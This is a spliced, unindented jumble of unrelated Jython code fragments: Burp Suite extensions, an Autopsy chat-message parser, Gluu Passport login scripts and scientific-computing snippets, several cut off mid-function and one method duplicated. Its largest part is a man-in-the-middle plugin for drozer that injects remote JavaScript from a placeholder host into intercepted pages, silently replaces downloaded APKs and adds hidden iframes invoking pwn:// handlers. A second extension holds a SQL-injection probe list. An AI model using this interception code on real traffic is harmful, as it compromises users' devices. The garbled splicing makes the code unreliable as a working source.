CdiUtil.bean(SessionIdService).updateSessionId(sessionId)
return logged_in
def registerExtenderCallbacks(self, callbacks):
# Make available to whole class
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("MitM helper plugin for drozer")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# Split pane
self._splitpane = swing.JSplitPane(swing.JSplitPane.HORIZONTAL_SPLIT)
# Create Tab
topPanel = swing.JPanel()
topPanel.setLayout(swing.BoxLayout(topPanel, swing.BoxLayout.Y_AXIS))
# Define all tools
self.tools = []
self.tools.append(
Tool(180, "JavaScript Injection",
"Inject Remote JS into HTTP Responses", self.nothing,
self.injectJs, "JS Location", "http://x.x.x.x:31415/dz.js"))
self.tools.append(
Tool(180, "APK Replacement",
"Replace APK with specified one when requested",
self.modifyAPKRequest, self.injectAPK, "APK Location", "",
True))
self.tools.append(
Tool(
170, "Invoke drozer using pwn://",
"Inject code into HTTP Responses that invokes installed drozer agent",
self.nothing, self.injectPwn, None, None, None,
"Perform active invocation (required for Chromium >= 25)"))
self.tools.append(
Tool(
220, "Custom URI Handler Injection",
"Inject code into HTTP Responses that invokes specified URI handler",
self.nothing, self.injectCustomURI, "URI", "pwn://me", None,
"Perform active invocation (required for Chromium >= 25)"))
# Add all tools to panel
for i in self.tools:
topPanel.add(i.getPanel())
self._splitpane.setLeftComponent(topPanel)
# table of log entries
logTable = Table(self)
logTable.setAutoResizeMode(swing.JTable.AUTO_RESIZE_ALL_COLUMNS)
logTable.getColumn("Time").setPreferredWidth(120)
logTable.getColumn("URL").setPreferredWidth(500)
scrollPane = swing.JScrollPane(logTable)
self._splitpane.setRightComponent(scrollPane)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(topPanel)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
return
class BurpExtender(IBurpExtender, ITab, IHttpListener,
IMessageEditorController, AbstractTableModel):
#
# Evil global variables
# Be ready to receive hate mail Tyrone & Daniel!
#
apkRequests = {}
#
# Executors
#
def injectPwn(self, messageInfo):
# Get response
response = messageInfo.getResponse()
responseParsed = self._helpers.analyzeResponse(response)
body = self._callbacks.getHelpers().bytesToString(
response)[responseParsed.getBodyOffset():]
headers = responseParsed.getHeaders()
if not self.tools[2].getTickBoxTicked():
# Method 1 - silent invocation - Inject iframe loading from pwn:// into responses (case insensitive)
changedContent = re.sub(
re.compile(r'</body>', re.IGNORECASE),
'<iframe src="pwn://lol" width=1 height=1 style="visibility:hidden;position:absolute"></iframe></body>',
body)
else:
# Method 2 - active invocation - redirect to the pwn:// handler (this is a requirement for versions of Chromium >= 25)
changedContent = re.sub(
re.compile(r'</body>', re.IGNORECASE),
'<script>window.location="pwn://www.google.com/pluginerror.html"</script></body>',
body)
changedContentBytes = self._callbacks.getHelpers().stringToBytes(
changedContent)
final = self._callbacks.getHelpers().buildHttpMessage(
headers, changedContentBytes)
# Set the response if the content changed and add to log
if body != changedContent:
messageInfo.setResponse(final)
self.addLog(
self._helpers.analyzeRequest(messageInfo).getUrl(),
"Injected drozer invocation with pwn://")
return
def injectJs(self, messageInfo):
# Get response
response = messageInfo.getResponse()
responseParsed = self._helpers.analyzeResponse(response)
body = self._callbacks.getHelpers().bytesToString(
response)[responseParsed.getBodyOffset():]
headers = responseParsed.getHeaders()
editBoxStr = str(self.tools[0].getEditBox())
# Inject arbitrary script into responses
changedContent = re.sub(
re.compile(r'<head>', re.IGNORECASE),
'<head><script src="' + editBoxStr + '"></script>', body)
changedContent = re.sub(
re.compile(r'</body>', re.IGNORECASE),
'<script src="' + editBoxStr + '"></script></body>',
changedContent)
changedContent = re.sub(
re.compile(r'<content>',
re.IGNORECASE), '<content><script src="' +
editBoxStr + '"></script>', changedContent)
changedContentBytes = self._callbacks.getHelpers().stringToBytes(
changedContent)
final = self._callbacks.getHelpers().buildHttpMessage(
headers, changedContentBytes)
# Set the response if the content changed and add to log
if body != changedContent:
messageInfo.setResponse(final)
self.addLog(
self._helpers.analyzeRequest(messageInfo).getUrl(),
"Injected JavaScript from " + editBoxStr)
return
def modifyAPKRequest(self, messageInfo):
# Get requested path
req = self._callbacks.getHelpers().analyzeRequest(messageInfo)
reqUrl = req.getUrl()
headers = list(req.getHeaders()) # convert to python list
reqHost = reqUrl.getHost()
reqPath = reqUrl.getPath()
reqPort = reqUrl.getPort()
# If it ends in .apk then change type to HEAD
if reqPath.upper().endswith(".APK"):
self.addLog(reqUrl, "Got request for APK...")
# Determine whether an HTTP or HTTPS connection must be made
if reqPort == 443:
conn = http.client.HTTPSConnection(reqHost, reqPort)
else:
conn = http.client.HTTPConnection(reqHost, reqPort)
# Get headers from user request
httpLibHeaders = {}
for i in headers:
splitHeaders = i.split(": ")
if len(splitHeaders) == 2:
httpLibHeaders[splitHeaders[0]] = splitHeaders[1]
# Perform HEAD on target file from server using headers
conn.request("HEAD", reqPath, headers=httpLibHeaders)
response = conn.getresponse()
responseHeaders = response.getheaders()
# Add to information for use by injectAPK()
version = ""
if str(response.version) == "11":
version = "HTTP/1.1"
else:
version = "HTTP/1.0"
self.apkRequests[reqPath] = [
reqUrl, version + " " + str(response.status) + " " +
str(response.reason), responseHeaders
]
print(self.apkRequests[reqPath])
# Instead of passing request - change host to www.google.com which will be non existent
httpService = messageInfo.getHttpService()
messageInfo.setHttpService(
self._callbacks.getHelpers().buildHttpService(
"www.google.com", httpService.getPort(),
httpService.getProtocol()))
return
def injectAPK(self, messageInfo):
# Get requested path
req = self._callbacks.getHelpers().analyzeRequest(messageInfo)
reqUrl = req.getUrl()
reqHost = reqUrl.getHost()
reqPath = reqUrl.getPath()
reqPort = reqUrl.getPort()
# If it ends in .apk then replace it!
if reqPath.upper().endswith(".APK"):
# Check this is a request we have seen
if reqPath in self.apkRequests:
# Get stored url and header
res = self.apkRequests[reqPath]
url = res[0]
httpStatus = res[1]
headers = []
headers.append(httpStatus)
for i in res[2]:
headers.append(i[0] + ': ' + ''.join(i[1:]))
# Open and read APK from specified path
f = open(self.tools[1].getEditBox())
changedContentBytes = f.read()
f.close()
final = self._callbacks.getHelpers().buildHttpMessage(
headers, changedContentBytes)
# Replace response with new APK
messageInfo.setResponse(final)
self.addLog(url, "Replaced APK!")
return
def injectCustomURI(self, messageInfo):
# Get response
response = messageInfo.getResponse()
responseParsed = self._helpers.analyzeResponse(response)
body = self._callbacks.getHelpers().bytesToString(
response)[responseParsed.getBodyOffset():]
headers = responseParsed.getHeaders()
uri = self.tools[3].getEditBox()
if not self.tools[3].getTickBoxTicked():
# Method 1 - silent invocation - Inject iframe loading from pwn:// into responses (case insensitive)
changedContent = re.sub(
re.compile(r'</body>', re.IGNORECASE), '<iframe src="' + uri +
'" width=1 height=1 style="visibility:hidden;position:absolute"></iframe></body>',
body)
else:
# Method 2 - active invocation - redirect to the pwn:// handler (this is a requirement for versions of Chromium >= 25)
changedContent = re.sub(
re.compile(r'</body>', re.IGNORECASE),
'<script>window.location="' + uri + '"</script></body>', body)
changedContentBytes = self._callbacks.getHelpers().stringToBytes(
changedContent)
final = self._callbacks.getHelpers().buildHttpMessage(
headers, changedContentBytes)
# Set the response if the content changed and add to log
if body != changedContent:
messageInfo.setResponse(final)
self.addLog(
self._helpers.analyzeRequest(messageInfo).getUrl(),
"Injected custom URI")
return
def nothing(self, messageInfo):
pass
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# Make available to whole class
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("MitM helper plugin for drozer")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# Split pane
self._splitpane = swing.JSplitPane(swing.JSplitPane.HORIZONTAL_SPLIT)
# Create Tab
topPanel = swing.JPanel()
topPanel.setLayout(swing.BoxLayout(topPanel, swing.BoxLayout.Y_AXIS))
# Define all tools
self.tools = []
self.tools.append(
Tool(180, "JavaScript Injection",
"Inject Remote JS into HTTP Responses", self.nothing,
self.injectJs, "JS Location", "http://x.x.x.x:31415/dz.js"))
self.tools.append(
Tool(180, "APK Replacement",
"Replace APK with specified one when requested",
self.modifyAPKRequest, self.injectAPK, "APK Location", "",
True))
self.tools.append(
Tool(
170, "Invoke drozer using pwn://",
"Inject code into HTTP Responses that invokes installed drozer agent",
self.nothing, self.injectPwn, None, None, None,
"Perform active invocation (required for Chromium >= 25)"))
self.tools.append(
Tool(
220, "Custom URI Handler Injection",
"Inject code into HTTP Responses that invokes specified URI handler",
self.nothing, self.injectCustomURI, "URI", "pwn://me", None,
"Perform active invocation (required for Chromium >= 25)"))
# Add all tools to panel
for i in self.tools:
topPanel.add(i.getPanel())
self._splitpane.setLeftComponent(topPanel)
# table of log entries
logTable = Table(self)
logTable.setAutoResizeMode(swing.JTable.AUTO_RESIZE_ALL_COLUMNS)
logTable.getColumn("Time").setPreferredWidth(120)
logTable.getColumn("URL").setPreferredWidth(500)
scrollPane = swing.JScrollPane(logTable)
self._splitpane.setRightComponent(scrollPane)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(topPanel)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
return
def addLog(self, url, action):
self._lock.acquire()
row = self._log.size()
self._log.add(
LogEntry(strftime("%Y-%m-%d %H:%M:%S", gmtime()), url, action))
self.fireTableRowsInserted(row, row)
self._lock.release()
#
# implement ITab
#
def getTabCaption(self):
return "drozer"
def getUiComponent(self):
return self._splitpane
#
# implement IHttpListener
#
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# Execute all enabled tools
for i in self.tools:
if i.getButtonEnabled():
if messageIsRequest:
i.getRequestExecutor()(messageInfo)
else:
i.getResponseExecutor()(messageInfo)
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 3
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Time"
if columnIndex == 1:
return "URL"
if columnIndex == 2:
return "Action"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return logEntry._time
if columnIndex == 1:
return logEntry._url
if columnIndex == 2:
return logEntry._action
return ""
def __findWWFMessagesInDB(self, databasePath, abstractFile, dataSource):
if not databasePath:
return
bbartifacts = list()
try:
Class.forName("org.sqlite.JDBC")
# load JDBC driver
connection = DriverManager.getConnection("jdbc:sqlite:" +
databasePath)
statement = connection.createStatement()
except (ClassNotFoundException) as ex:
self._logger.log(Level.SEVERE, "Error loading JDBC driver", ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
return
except (SQLException) as ex:
# Error opening database.
return
# Create a 'Device' account using the data source device id
datasourceObjId = dataSource.getDataSource().getId()
ds = Case.getCurrentCase().getSleuthkitCase().getDataSource(
datasourceObjId)
deviceID = ds.getDeviceId()
deviceAccountInstance = Case.getCurrentCase().getSleuthkitCase(
).getCommunicationsManager().createAccountFileInstance(
Account.Type.DEVICE, deviceID, general.MODULE_NAME, abstractFile)
uuid = UUID.randomUUID().toString()
resultSet = None
try:
resultSet = statement.executeQuery(
"SELECT message, strftime('%s' ,created_at) as datetime, user_id, game_id FROM chat_messages ORDER BY game_id DESC, created_at DESC;"
)
while resultSet.next():
message = resultSet.getString("message") # WWF Message
created_at = resultSet.getLong("datetime")
user_id = resultSet.getString(
"user_id") # the ID of the user who sent the message.
game_id = resultSet.getString(
"game_id"
) # ID of the game which the the message was sent.
thread_id = "{0}-{1}".format(uuid, user_id)
attributes = ArrayList()
artifact = abstractFile.newArtifact(
BlackboardArtifact.ARTIFACT_TYPE.TSK_MESSAGE
) # create a call log and then add attributes from result set.
attributes.add(
BlackboardAttribute(
BlackboardAttribute.ATTRIBUTE_TYPE.TSK_DATETIME,
general.MODULE_NAME, created_at))
attributes.add(
BlackboardAttribute(
BlackboardAttribute.ATTRIBUTE_TYPE.TSK_NAME,
general.MODULE_NAME, user_id))
attributes.add(
BlackboardAttribute(
BlackboardAttribute.ATTRIBUTE_TYPE.TSK_MSG_ID,
general.MODULE_NAME, game_id))
attributes.add(
BlackboardAttribute(
BlackboardAttribute.ATTRIBUTE_TYPE.TSK_TEXT,
general.MODULE_NAME, message))
attributes.add(
BlackboardAttribute(
BlackboardAttribute.ATTRIBUTE_TYPE.TSK_MESSAGE_TYPE,
general.MODULE_NAME, "Words With Friends Message"))
attributes.add(
BlackboardAttribute(
BlackboardAttribute.ATTRIBUTE_TYPE.TSK_THREAD_ID,
general.MODULE_NAME, thread_id))
artifact.addAttributes(attributes)
# Create an account
wwfAccountInstance = Case.getCurrentCase().getSleuthkitCase(
).getCommunicationsManager().createAccountFileInstance(
wwfAccountType, user_id, general.MODULE_NAME, abstractFile)
# create relationship between accounts
Case.getCurrentCase().getSleuthkitCase(
).getCommunicationsManager().addRelationships(
deviceAccountInstance, [wwfAccountInstance], artifact,
Relationship.Type.MESSAGE, created_at)
bbartifacts.append(artifact)
try:
# index the artifact for keyword search
blackboard = Case.getCurrentCase().getSleuthkitCase(
).getBlackboard()
blackboard.postArtifact(artifact, general.MODULE_NAME)
except Blackboard.BlackboardException as ex:
self._logger.log(
Level.SEVERE, "Unable to index blackboard artifact " +
str(artifact.getArtifactID()), ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
MessageNotifyUtil.Notify.error(
"Failed to index WWF message artifact for keyword search.",
artifact.getDisplayName())
except SQLException as ex:
# Unable to execute WWF messages SQL query against database.
pass
except Exception as ex:
self._logger.log(
Level.SEVERE,
"Error parsing messages from Words With Friends.", ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
finally:
try:
if resultSet is not None:
resultSet.close()
statement.close()
connection.close()
except Exception as ex:
# Error closing database.
pass
def registerExtenderCallbacks(self, callbacks):
# Set encoding to utf-8 to avoid some errors
reload(sys)
sys.setdefaultencoding('utf8')
# Keep a reference to callback object and helper object
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
# Set the extension name that shows in the burp extension menu
callbacks.setExtensionName("InjectionScanner")
# Create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._logLock = Lock()
self._httpLock = Lock()
# The length of the basis used to fetch abnormal data, default to zero
self._basisLen = 0
# 1: {POST. GET}; 2: {urlencoded, json, xml}
self._postGet = 'NaN'
self._dataType = 'NaN'
# Scan list
self._simpleList = [
'\'', '\"', '/', '/*', '#', ')', '(', ')\'', '(\'', 'and 1=1',
'and 1=2', 'and 1>2', 'and 12', '+', 'and+12', '/**/and/**/1'
]
self._xmlList = ['a', 'b', 'c', 'd', 'e'] # Not setted
# Response mutex: True = is blocking; False = free to go
# self._mutexR = False
# Other classes instance
self._dataTable = Guis_DefaultTM()
self._logTable = Guis_AbstractTM(self)
self._xh = XMLHandler()
listeners = Guis_Listeners(self, self._logTable)
'''
Setting GUIs
'''
# Divide the whole pane two: one upper and one lower pane
self._mainSplitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
self._mainSplitpane.setResizeWeight(0.4)
# Initizlize request table
dataTable = JTable(self._dataTable)
dataScrollPane = JScrollPane(dataTable)
dataScrollPane.setPreferredSize(Dimension(0, 125))
self._dataTable.addTableModelListener(listeners)
# Initialize log table
logTable = Guis_LogTable(self._logTable)
logScrollPane = JScrollPane(logTable)
logScrollPane.setPreferredSize(Dimension(0, 125))
# Split the upper pane to two panes
tableSplitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
tableSplitpane.setResizeWeight(0.5)
# Set the data table to the left and log to the right
tableSplitpane.setLeftComponent(dataScrollPane)
tableSplitpane.setRightComponent(logScrollPane)
# Tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
# Create buttons that do operation with the test
self._basisLabel = JLabel('Basis: ' + str(self._basisLen))
self._levelLabel = JLabel('Level:')
self._setBasisButton = JButton('Set Basis')
self._hitOnceButton = JButton('Hit Once')
self._autoScanButton = JButton('Auto Scan')
self._clearLogButton = JButton('Clear Log')
self._cancelButton = JButton('Cancel')
self._levelSelection = JComboBox()
self._levelSelection.addItem('1')
self._levelSelection.addItem('2')
self._levelSelection.addItem('3')
self._hitOnceButton.addActionListener(listeners)
self._autoScanButton.addActionListener(listeners)
self._clearLogButton.addActionListener(listeners)
self._setBasisButton.addActionListener(listeners)
self._cancelButton.addActionListener(listeners)
self._basisLabel.setPreferredSize(Dimension(100, 20))
# Create bottom pane for holding the buttons
buttonPane = JPanel()
buttonPane.setLayout(BorderLayout())
centerPane = JPanel()
leftPane = JPanel()
rightPane = JPanel()
leftPane.add(self._basisLabel)
centerPane.add(self._setBasisButton)
centerPane.add(self._hitOnceButton)
centerPane.add(self._autoScanButton)
centerPane.add(self._cancelButton)
centerPane.add(self._clearLogButton)
rightPane.add(self._levelLabel)
rightPane.add(self._levelSelection)
buttonPane.add(centerPane, BorderLayout.CENTER)
buttonPane.add(leftPane, BorderLayout.WEST)
buttonPane.add(rightPane, BorderLayout.EAST)
# Create and set the bottom panel that holds viewers and buttons
utilPane = JPanel()
utilPane.setLayout(BorderLayout())
utilPane.add(tabs, BorderLayout.CENTER)
utilPane.add(buttonPane, BorderLayout.SOUTH)
self._mainSplitpane.setLeftComponent(tableSplitpane)
self._mainSplitpane.setRightComponent(utilPane)
# Customize UI components
callbacks.customizeUiComponent(self._mainSplitpane)
callbacks.customizeUiComponent(dataTable)
callbacks.customizeUiComponent(dataScrollPane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(logScrollPane)
callbacks.customizeUiComponent(tabs)
callbacks.customizeUiComponent(buttonPane)
callbacks.customizeUiComponent(utilPane)
callbacks.customizeUiComponent(self._basisLabel)
callbacks.customizeUiComponent(self._setBasisButton)
callbacks.customizeUiComponent(self._hitOnceButton)
callbacks.customizeUiComponent(self._autoScanButton)
callbacks.customizeUiComponent(self._clearLogButton)
callbacks.customizeUiComponent(self._levelSelection)
callbacks.customizeUiComponent(self._cancelButton)
# Add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# Register the context menu and message editor for new tabs
callbacks.registerContextMenuFactory(self)
# Register as a HTTP listener
callbacks.registerHttpListener(self)
return
def fillUser(self, foundUser, profile):
# To save the Persistent ID
identity = CdiUtil.bean(Identity)
sessionAttributes = identity.getSessionId().getSessionAttributes()
currentRp = sessionAttributes.get("entityId")
issuerSpNameQualifier = sessionAttributes.get("spNameQualifier")
for attr in profile:
# "provider" is disregarded if part of mapping
if attr != self.providerKey:
values = profile[attr]
print "Passport-social. fillUser. %s = %s" % (attr, values)
# COLLECT - here go through existing PersistentIDs add new ones for RPs that if they are not found
if attr == "persistentId":
if (values != None):
# There is only one value from the mapping
newPersistenId = values[0]
# then we look through the old values if there is a matching RP remove if from "values" and do not update
userPersistentIds = foundUser.getAttributeValues("persistentId")
if ( userPersistentIds != None and issuerSpNameQualifier != None ):
for userPersistentId in userPersistentIds:
if ( userPersistentId.find(issuerSpNameQualifier) > -1 ):
values.pop(0)
# if there still is a persistentId, then add it to the current user profile
if ( len(values) > 0):
print "Passport-social. fillUser. Updating persistent IDs, original = '%s'" % userPersistentIds
# if there are no current Persistent IDs create a new list
tmpList = ArrayList(userPersistentIds) if userPersistentIds != None else ArrayList()
tmpList.add(newPersistenId)
print "Passport-social. fillUser. Updating persistent IDs, updated = '%s'" % tmpList
foundUser.setAttribute(attr, tmpList)
else:
print "Passport-social. fillUser. PersistentId for RP '%s' already exists, ignoring new RP mapping" % issuerSpNameQualifier
elif attr == "oxExternalUid_newMfa":
# The attribute is here so MFA flow is REQUIRED.
# First we check for existing MFA PAI already in the user profile
mfaOxExternalUid = values[0]
userOxExternalUids = foundUser.getAttributeValues("oxExternalUid")
if (userOxExternalUids != None):
for userOxExternalUid in userOxExternalUids:
if ( userOxExternalUid.find("passport-mfa:") > -1 ):
# if we found an MFA PAI then remove the new value
mfaOxExternalUid = userOxExternalUid
values.pop(0)
# if there still is a value for MFA PAI, then add it to the current user profile because it did not exist
if ( len(values) > 0):
print "Passport-social. fillUser. Updating MFA PAI oxExternalUid, original list = '%s'" % userOxExternalUids
# if there are no current Persistent IDs create a new list
tmpList = ArrayList(userOxExternalUids) if userOxExternalUids != None else ArrayList()
tmpList.add( mfaOxExternalUid )
print "Passport-social. fillUser. Updating persistent IDs, updated with MFA = '%s'" % tmpList
foundUser.setAttribute("oxExternalUid", tmpList)
else:
print "Passport-social. fillUser. oxExternalUid for MFA '%s' already exists, ignoring new RP mapping" % mfaOxExternalUid
elif attr == "mail":
oxtrustMails = []
for mail in values:
oxtrustMails.append('{"value":"%s","primary":false}' % mail)
foundUser.setAttribute("oxTrustEmail", oxtrustMails)
elif attr == "claims":
if (values != None):
timeSeconds = int(round(time.time()))
# load claims: TODO validation of parsing result
claims = json.loads(values[0])
# create the access token attribute for Shibboleth IDP to extract the value for SAML and save it in "transientId"
accessTokenWithRpAndTimestamp = '%s|%s|%s|%s' % (currentRp, timeSeconds, claims["userinfourl"], claims["accesstoken"] )
print "Passport-social. updateUser. Claims adding access token (as transientId) '%s'" % accessTokenWithRpAndTimestamp
foundUser.setAttribute( "transientId", accessTokenWithRpAndTimestamp )
# Save the claims into the session for distributed claims (USELESS TODAY, TODO: REMOVE)
sessionAttributes.put("identityClaimsAccessToken", claims["accesstoken"])
sessionAttributes.put("identityClaimsUserInfoURL", claims["userinfourl"])
else:
foundUser.setAttribute(attr, values)
def getStartupErrors(self):
from java.util import ArrayList
errorList = ArrayList()
for err in self.getImportErrors():
errorList.add(str(err))
return errorList
SwapEdge(liaison, opts).compute()
writeVTK(liaison)
opts.clear()
opts.put("coplanarity", "0.75")
opts.put("tolerance", "0.6")
opts.put("iterations", str(8))
SmoothNodes3DBg(liaison, opts).compute()
writeVTK(liaison)
#MeshWriter.writeObject3D(liaison.mesh, outDir, ""
polylines = PolylineFactory(liaison.mesh, 135.0, options.size * 0.2)
liaison.mesh.resetBeams()
for entry in polylines.entrySet():
groupId = entry.key
for polyline in entry.value:
listM = ArrayList()
for v in polyline:
listM.add(EuclidianMetric3D(options.size))
#print "Remesh polyline of group "+str(groupId)+"/"+str(polylines.size())+" "+str(polyline.size())+" vertices"
result = RemeshPolyline(liaison.mesh, polyline, listM).compute()
for i in xrange(result.size() - 1):
liaison.mesh.addBeam(result.get(i), result.get(i + 1), groupId)
#print " New polyline: "+str(result.size())+" vertices"
if options.recordFile:
liaison.getMesh().getTrace().finish()
MeshWriter.writeObject3D(liaison.mesh, outDir, "")
from java.util import ArrayList
LIST = ['One', -2, False]
EMPTY_LIST = []
keyword_patterns = ArrayList()
keyword_patterns.add("org/**/keyword/**/**.class")
keyword_patterns.add("com/**/keyword/**/**.class")
duplicate_keyword_patterns = ArrayList()
duplicate_keyword_patterns.add("com/**/keyword/**/**.class")
duplicate_keyword_patterns.add("my/same/keyword/**/**.class")
def createMenuItems(self, context_menu):
self.context = context_menu
menu_list = ArrayList()
menu_list.add(JMenuItem("Send to Bing",
actionPerformed=self.bing_menu))
return menu_list
def attemptAuthentication(self, identity, user_profile, user_profile_json):
# "uid" is always present in mapping, see prepareAttributesMapping
uidRemoteAttr = self.getRemoteAttr("uid")
providerKey = "provider" if self.behaveAs == "social" else "providerkey"
if not self.checkRequiredAttributes(user_profile, [uidRemoteAttr, providerKey]):
return False
provider = user_profile[providerKey]
print provider
print self.registeredProviders
if not provider in self.registeredProviders:
print "Passport. attemptAuthentication. Identity Provider %s not recognized" % provider
return False
uidRemoteAttr = user_profile[uidRemoteAttr]
if self.behaveAs == "social":
externalUid = "passport-%s:%s" % (provider, uidRemoteAttr)
else:
# This is for backwards compat. Should it be passport-saml-provider:...??
externalUid = "passport-%s:%s" % ("saml", uidRemoteAttr)
userService = CdiUtil.bean(UserService)
userByUid = userService.getUserByAttribute("oxExternalUid", externalUid)
mailRemoteAttr = self.getRemoteAttr("mail")
email = None
if mailRemoteAttr in user_profile:
email = self.flatValues(user_profile[mailRemoteAttr])
if len(email) == 0:
email = None
else:
email = email[0]
user_profile[mailRemoteAttr] = email
if email == None and self.registeredProviders[provider]["requestForEmail"]:
print "Passport. attemptAuthentication. Email was not received"
if userByUid != None:
# This helps asking for the email over every login attempt
email = userByUid.getAttribute("mail")
if email != None:
print "Passport. attemptAuthentication. Filling missing email value with %s" % email
# Assumes mailRemoteAttr is not None
user_profile[mailRemoteAttr] = email
if email == None:
# Store user profile in session and abort this routine
identity.setWorkingParameter("passport_user_profile", user_profile_json)
return True
userByMail = None if email == None else userService.getUserByAttribute("mail", email)
# Determine if we should add entry, update existing, or deny access
doUpdate = False
doAdd = False
if userByUid != None:
print "User with externalUid '%s' already exists" % externalUid
if userByMail == None:
doUpdate = True
else:
if userByMail.getUserId() == userByUid.getUserId():
doUpdate = True
else:
print "Users with externalUid '%s' and mail '%s' are different. Access will be denied. Impersonation attempt?" % (externalUid, email)
else:
if userByMail == None:
doAdd = True
elif self.registeredProviders[provider]["emailLinkingSafe"]:
tmpList = userByMail.getAttributeValues("oxExternalUid")
tmpList = ArrayList() if tmpList == None else ArrayList(tmpList)
tmpList.add(externalUid)
userByMail.setAttribute("oxExternalUid", tmpList)
userByUid = userByMail
print "External user supplying mail %s will be linked to existing account '%s'" % (email, userByMail.getUserId())
doUpdate = True
else:
print "An attempt to supply an email of an existing user was made. Turn on 'emailLinkingSafe' if you want to enable linking"
username = None
try:
if doUpdate:
username = userByUid.getUserId()
print "Passport. attemptAuthentication. Updating user %s" % username
self.updateUser(userByUid, user_profile, userService)
elif doAdd:
print "Passport. attemptAuthentication. Creating user %s" % externalUid
newUser = self.addUser(externalUid, user_profile, userService)
username = newUser.getUserId()
except:
print "Exception: ", sys.exc_info()[1]
print "Passport. attemptAuthentication. Authentication failed"
return False
if username == None:
print "Passport. attemptAuthentication. Authentication attempt was rejected"
return False
else:
logged_in = CdiUtil.bean(AuthenticationService).authenticate(username)
print "Passport. attemptAuthentication. Authentication for %s returned %s" % (username, logged_in)
return logged_in
def generateExceedanceValues():
return jf(lambda v: calculateExceedance(ArrayList(v.values())))
def makeNullResponse(self):
response = ArrayList()
response.add(
ResponseMessageGeneric("Database Query returned no results"))
return response
def getDCH_Field_Arr_for_Trial(self, trial):
#------ return dch field array for the trial point
field_arr = []
for dch_ind in range(self.variables.size()):
var = self.variables.get(dch_ind)
field = trial.getTrialPoint().getValue(var)
field_arr.append(field)
return field_arr
#---- Initial step in parameters. During optimization
#---- these steps will be reduced inside the optimizer.
delta_hint = InitialDelta()
#---- optimizing variabes
variables = ArrayList()
field_max = 0.012
field_min = -0.012
field_step = (field_max - field_min) / 30
for dch_ind in range(len(dchs)):
dch = dchs[dch_ind]
field = dch.getField()
var = Variable(dch.getId(), field, field_min, field_max)
variables.add(var)
delta_hint.addInitialDelta(var, field_step)
scorer = OrbitScorer(bpms, dchs, variables)
def setPath(self, path):
self.path = ArrayList(len(path))
self.addPaths(path)
def attemptAuthentication(self, identity, user_profile, user_profile_json):
uidKey = "uid"
if not self.checkRequiredAttributes(user_profile,
[uidKey, self.providerKey]):
return False
provider = user_profile[self.providerKey]
if not provider in self.registeredProviders:
print "Passport. attemptAuthentication. Identity Provider %s not recognized" % provider
return False
uid = user_profile[uidKey][0]
externalUid = "passport-%s:%s" % (provider, uid)
userService = CdiUtil.bean(UserService)
userByUid = userService.getUserByAttribute("oxExternalUid",
externalUid)
email = None
if "mail" in user_profile:
email = user_profile["mail"]
if len(email) == 0:
email = None
else:
email = email[0]
user_profile["mail"] = [email]
if email == None and self.registeredProviders[provider][
"requestForEmail"]:
print "Passport. attemptAuthentication. Email was not received"
if userByUid != None:
# This avoids asking for the email over every login attempt
email = userByUid.getAttribute("mail")
if email != None:
print "Passport. attemptAuthentication. Filling missing email value with %s" % email
user_profile["mail"] = [email]
if email == None:
# Store user profile in session and abort this routine
identity.setWorkingParameter("passport_user_profile",
user_profile_json)
return True
userByMail = None if email == None else userService.getUserByAttribute(
"mail", email)
# Determine if we should add entry, update existing, or deny access
doUpdate = False
doAdd = False
if userByUid != None:
print "User with externalUid '%s' already exists" % externalUid
if userByMail == None:
doUpdate = True
else:
if userByMail.getUserId() == userByUid.getUserId():
doUpdate = True
else:
print "Users with externalUid '%s' and mail '%s' are different. Access will be denied. Impersonation attempt?" % (
externalUid, email)
self.setMessageError(
FacesMessage.SEVERITY_ERROR,
"Email value corresponds to an already existing provisioned account"
)
else:
if userByMail == None:
doAdd = True
elif self.registeredProviders[provider]["emailLinkingSafe"]:
tmpList = userByMail.getAttributeValues("oxExternalUid")
tmpList = ArrayList() if tmpList == None else ArrayList(
tmpList)
tmpList.add(externalUid)
userByMail.setAttribute("oxExternalUid", tmpList)
userByUid = userByMail
print "External user supplying mail %s will be linked to existing account '%s'" % (
email, userByMail.getUserId())
doUpdate = True
else:
print "An attempt to supply an email of an existing user was made. Turn on 'emailLinkingSafe' if you want to enable linking"
self.setMessageError(
FacesMessage.SEVERITY_ERROR,
"Email value corresponds to an already existing account.")
username = None
try:
if doUpdate:
username = userByUid.getUserId()
print "Passport. attemptAuthentication. Updating user %s" % username
self.updateUser(userByUid, user_profile, userService)
elif doAdd:
print "Passport. attemptAuthentication. Creating user %s" % externalUid
newUser = self.addUser(externalUid, user_profile, userService)
username = newUser.getUserId()
except:
